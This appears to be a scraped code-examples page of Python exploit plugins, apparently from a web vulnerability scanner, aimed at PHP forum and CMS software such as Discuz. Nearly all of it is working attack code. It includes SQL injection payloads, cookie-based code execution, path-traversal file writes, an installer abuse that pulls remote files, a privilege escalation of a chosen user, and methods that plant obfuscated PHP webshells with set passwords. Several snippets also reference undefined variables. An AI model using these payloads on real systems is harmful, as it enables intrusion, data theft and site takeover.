Exemplo n.º 1
0
    def _attack(self):
        result = Result()

        phpPayload = "${@assert($_POST[alpha])}"

        sig = '9876541'

        self.params['mid'] = "1"
        self.params['action'] = "search"
        self.params['keyword'] = "asd"
        self.params['postdb[city_id]'] = "../../admin/hack"
        self.params['hack'] = "jfadmin"
        self.params['action'] = "addjf"
        self.params['Apower[jfadmin_mod]'] = "1"
        self.params['fid'] = "1"
        self.params['title'] = phpPayload

        url = self.urlJoin("/search.php")
        response1 = self.http.get(url, params=self.params)

        payload = {"alpha": "print {0};".format(sig)}
        url = url.replace("search.php", "do/jf.php")
        response2 = self.http.post(url, data=payload)

        if response2.status_code == 200:
            if sig in response2.content:
                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = self.baseURL + "/do/jf.php"
                result['ShellInfo']['Content'] = phpPayload

        return result
    def _verify(self):
        result = Result()

        sig = '2c1743a391305fbf367df8e4f069f9f9'
        payload = {
            "formhash":
            "04949b0",
            "srchtxt":
            "aa",
            "srchtype":
            "threadsort",
            "st":
            "on",
            "sortid":
            "3",
            "selectsortid":
            "3 where tid=(select 1 from (select count(*),concat({0},floor(rand(0)*2))x from information_schema.tables group by x)a)#"
            .format(sig),
            "searchsubmit":
            "true"
        }

        url = self.urlJoin("/search.php")
        response = self.http.post(url, data=payload)

        if response.status_code == 200:
            if sig in response.content and "SQL" in response.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = response.request.body
                result['VerifyInfo']['Payload'] = response.request.body

        return result
    def _verify(self):
        result = Result()

        dctype = self.elseArgs.get("type", "discuz").lower()
        if dctype not in ['discuz', 'discuzx']:
            dctype = "discuz"
        date = self.elseArgs.get("date", "15-01-01")
        days = self.elseArgs.get("days", "10")
        days = int(days)
        dirs = self.elseArgs.get("dirs", "1")
        dirs = int(dirs)

        url = self.baseURL if ".php" in self.url else self.url
        url = url.rstrip("/")
        alives = []
        for path in self.genPath(dctype, date, days, dirs):
            try:
                print "debug>>>>>>>>", url + path
                response = self.http.get(url + path)
            except self.http.RequestException:
                pass

            if response.status_code == 200:
                print "debug=============================", url + path
                alives.append(url + path)

        if alives:
            result['Else'] = {}
            result['Else']['Target'] = self.url
            result['Else']['Info'] = str(alives)

        return result
Exemplo n.º 4
0
    def _verify(self):
        result = Result()

        phpPayload = "${@assert($_POST[alpha])}"
        #phpPayload = "${@fwrite(fopen('ali.php', 'w+'),'test')}"

        sig = '9876541'

        self.params['mid'] = "1"
        self.params['keyword'] = "asd"
        self.params['postdb[city_id]'] = "../../admin/hack"
        self.params['hack'] = "jfadmin"
        self.params['action'] = "addjf"
        self.params['Apower[jfadmin_mod]'] = "1"
        self.params['fid'] = "1"
        self.params['title'] = phpPayload

        url = self.urlJoin("/search.php")
        response1 = self.http.get(url, params=self.params)

        payload = {"alpha": "print {0};".format(sig)}
        url = url.replace("search.php", "do/jf.php")
        response2 = self.http.post(url, data=payload)

        if response2.status_code == 200:
            if sig in response2.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = str(payload)

        return result
Exemplo n.º 5
0
    def _attack(self):
        result = Result()

        vulfile = self.elseArgs.get("vulfile", None)
        vulpath = self.elseArgs.get("vulpath", None)

        if not vulfile or not vulpath:
            print "Missing --elseargs, should be '--elseargs vulfile=shell.php#vulpath=http://aa.com'"
            return []

        self.params['step'] = "11"
        self.params['insLockfile'] = "a"
        self.params['s_lang'] = "a"
        self.params['install_demo_name'] = "../data/admin/config_update.php"

        url = self.urlJoin("/install/index.php")
        response1 = self.http.get(url, params=self.params)

        self.params['install_demo_name'] = vulfile
        self.params['updateHost'] = vulpath
        response2 = self.http.get(url, params=self.params)

        url = url.replace("index.php", vulfile)
        response3 = self.http.get(url)
        #print "debug>>>>>",response.request.url
        #print "debug>>>>>",response.content
        if response3.status_code == 200:
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = url

        return result
Exemplo n.º 6
0
    def _verify(self):
        result = Result()

        result['Else'] = {}
        result['Else']['Target'] = self.url
        result['Else']['Info'] = self.genBypassLink()

        return result
    def _attack(self):
        result = Result()

        phpPayload = "phpinfo();"
        sig = '_SERVER["HTTP_HOST"]'

        url = self.urlJoin("/inc/splitword.php")
        response = self.http.post(url, data={'Y2hlbmdzaGlzLmMjd':phpPayload})

        if response.status_code == 200:
            if sig in response.content:
                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = url
                result['ShellInfo']['Content'] = "@eval($_POST['Y2hlbmdzaGlzLmMjd']);"

        return result
    def _verify(self):
        result = Result()

        phpPayload = "phpinfo();"
        sig = '_SERVER["HTTP_HOST"]'

        url = self.urlJoin("/inc/splitword.php")
        response = self.http.post(url, data={'Y2hlbmdzaGlzLmMjd':phpPayload})

        if response.status_code == 200:
            if sig in response.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = phpPayload

        return result
Exemplo n.º 9
0
    def _verify(self):
        result = Result()

        php_code = '''echo "asdfgh123456";'''
        attack_payload = self._genPayload(php_code)

        response = self.http.get(self.url,
                                 headers={"User-Agent": attack_payload})

        if response.status_code == 200:
            response = session.get(self.url)
            if response.status_code == 200 and 'asdfgh123456' in response.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = attack_payload

        return result
    def _verify(self):
        result = Result()

        sig = '2c1743a391305fbf367df8e4f069f9f9'
        params = "?inc=edit_sort&act=modify&name[]=yyy"
        payload = {"table_album": "{0}".format(sig)}

        url = self.urlJoin("/blog/ajax.php")
        response = self.http.post(url + params, params=payload)

        if response.status_code == 200:
            if sig in response.content and "doesn't exist" in response.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = response.request.url

        return result
Exemplo n.º 11
0
    def _verify(self):
        result = Result()

        sig = '_SERVER["HTTP_HOST"]'
        cookie = "GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();"
        headers = dict()
        headers['Cookie'] = cookie

        response = self.http.get(self.url, headers=headers)

        if response.status_code == 200:
            if sig in response.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = cookie

        return result
    def _verify(self):
        result = Result()

        sig = '2c1743a391305fbf367df8e4f069f9f9'
        payload = "1' and 1=2 union all select 1,'{0}".format(sig)
        self.params['mod'] = "attachment"
        self.params['findpost'] = "ss"
        self.params['aid'] = base64.b64encode(payload)

        url = self.urlJoin("/forum.php")
        response = self.http.get(url, params=self.params)

        if response.status_code == 200:
            if sig in response.request.url:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = payload

        return result
    def _verify(self):
        result = Result()

        sig = '2c1743a391305fbf367df8e4f069f9f9'
        payload = "1 and select 1 from (select concat_ws(':', left(rand(), 3), {0}), count(*) from information_schema.tables group by 1)a;".format(
            sig)

        self.params['ac'] = 'view'
        self.params['shopid'] = payload

        url = self.urlJoin("/shop.php")
        response = self.http.get(url, params=self.params)

        if response.status_code == 200:
            if sig in response.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = payload

        return result
Exemplo n.º 14
0
    def _attack(self):
        result = Result()
        #php_code = '''print "start-->|";echo __FILE__;'''
        #php_code = '''print "start-->|";echo getcwd();'''
        #php_code = '''$s='<?php @eval($_POST["pass"]);?>';$n=dirname(dirname(dirname(__FILE__)))."/images/parse.php";$f=fopen($n,"w");fwrite($f,$s);'''
        php_code = '''$s='<?php $f=strrev($_GET["f"]);$f($_POST["pass"]);?>';$n=dirname(dirname(dirname(__FILE__)))."/images/parse.php";$f=fopen($n,"w");fwrite($f,$s);'''
        attack_payload = self._genPayload(php_code)

        response = self.http.get(self.url,
                                 headers={"User-Agent": attack_payload})

        if response.status_code == 200:
            response = session.get(self.url)
            response = session.get(self.urlJoin("/images/parse.php"))
            if response.status_code == 200:
                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = "/images/parse.php?f=tressa"
                result['ShellInfo']['Content'] = 'password: pass'

        return result
    def _attack(self):
        result = Result()

        uid = self.elseArgs.get("uid", "3")
        params = "?inc=edit_sort&act=modify&name[]=yyy"
        payload = {
            "table_album":
            "memberdata` set groupid=3 where uid={0}#".format(uid)
        }

        url = self.urlJoin("/blog/ajax.php")
        response = self.http.post(url + params, params=payload)

        if response.status_code == 200:
            if sig in response.content and "doesn't exist" in response.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = response.request.url

        return result
    def _verify(self):
        result = Result()

        sig = '9876541'
        params = "?inc=ol_module&step=2&moduleid=../../../../do/js&&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1"
        payload = {
            "pre":
            "qb_label where lid=-1 UNION SELECT 1,2,3,4,5,6,0,{0},9,10,11,12,13,14,15,16,17,18,19#"
            .format(sig)
        }

        url = self.urlJoin("/blog/ajax.php")
        response = self.http.get(url + params, params=payload)

        if response.status_code == 200:
            if sig in response.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = response.request.url

        return result
Exemplo n.º 17
0
    def _verify(self):
        result = Result()

        sig = u"才能浏览"
        userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
        #userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://**.**.**.**/search/spider.html)"
        headers = {'User-Agent': userAgent}

        response = self.http.get(self.url)
        response2 = self.http.get(self.url, headers=headers)

        if response2.status_code == 200:
            if sig.encode("utf-8") in response.content and sig.encode(
                    "gbk") in response.content and sig.encode(
                        "utf-8") not in response2.content and sig.encode(
                            "gbk") not in response2.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = userAgent

        return result
Exemplo n.º 18
0
    def _verify(self):
        result = Result()

        sig = '_SERVER["HTTP_HOST"]'
        payload = "<?php phpinfo();?>"
        params = "?inc=ol_module&step=2&step=2&moduleid=../../../../hack/template/admin&action=maketpl&Apower[template_list]=1&postdb[filepath]=template/blue.htm&postdb[code]={0}".format(
            payload)

        url = self.urlJoin("/blog/ajax.php")
        response = self.http.get(url + params)

        params2 = "?inc=edit_sort&job=../../../../template/blue"
        response2 = self.http.get(url + params2)

        if response2.status_code == 200:
            if sig in response2.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = payload

        return result
Exemplo n.º 19
0
    def _verify(self):
        result = Result()

        sig = '9876541'
        params = "?step=1"
        payload = {
            "type":
            "area where 1=(updatexml(1,concat(0x5e24,(select {0}),0x5e24),1))#"
            .format(sig)
        }

        url = self.urlJoin("/blog/member/update_sort.php")
        response = self.http.get(url + params, params=payload)

        if response.status_code == 200:
            if sig in response.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = response.request.url

        return result
Exemplo n.º 20
0
    def _attack(self):
        result = Result()

        sig = u"才能浏览"
        userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
        headers = {'User-Agent': userAgent}

        response = self.http.get(self.url)
        response2 = self.http.get(self.url, headers=headers)

        if response2.status_code == 200:
            if sig.encode("utf-8") in response.content and sig.encode(
                    "gbk") in response.content and sig.encode(
                        "utf-8") not in response2.content and sig.encode(
                            "gbk") not in response2.content:
                with open("result.html", "w") as fd:
                    fd.write(response2.conetnt)
                result['FileInfo'] = {}
                result['FileInfo']['Filename'] = "result.html"

        return result
Exemplo n.º 21
0
    def _attack(self):
        result = Result()

        sig = "strrev"
        payload = '<?php $f=strrev($_GET["f"]);$f($_POST["pass"]);?>'
        params = "?inc=ol_module&step=2&step=2&moduleid=../../../../hack/template/admin&action=maketpl&Apower[template_list]=1&postdb[filepath]=template/green.htm&postdb[code]={0}".format(
            payload)

        url = self.urlJoin("/blog/ajax.php")
        response = self.http.get(url + params)

        url2 = url.replace("/blog/ajax.php", "/template/green.htm")
        response2 = self.http.get(url2)

        if response2.status_code == 200:
            if sig in response2.content:
                result['ShellInfo'] = {}
                result['ShellInfo'][
                    'URL'] = url + "?inc=edit_sort&job=../../../../template/green&f=tressa"
                result['ShellInfo']['Payload'] = "password: pass"

        return result
Exemplo n.º 22
0
    def _verify(self):
        result = Result()

        sig = '2c1743a391305fbf367df8e4f069f9f9'
        payload = {
            "gids[99]":
            "'",
            "gids[100][0]":
            ") and (select 1 from (select count(*),concat({0},floor(rand(0)*2))x from information_schema.tables group by x)a)#"
            .format(sig)
        }

        url = self.url if "faq.php" in self.url else self.host + "/faq.php?action=grouppermission"
        response = self.http.post(url, data=payload)

        if response.status_code == 200:
            if sig in response.content and "SQL" in response.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = response.request.body

        return result
Exemplo n.º 23
0
    def _verify(self):
        result = Result()

        sig = u"远程获取失败"

        params['step'] = "11"
        params['insLockfile'] = "a"
        params['s_lang'] = "a"
        params['install_demo_name'] = "../data/admin/config_update.php"

        url = self.urlJoin("/install/index.php")
        response = self.http.get(url, params=params)
        #print "debug>>>>>",response.request.url
        #print "debug>>>>>",response.content
        if response.status_code == 200:
            if sig.encode('gbk') in response.content or sig.encode(
                    'utf-8') in response.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = str(params)

        return result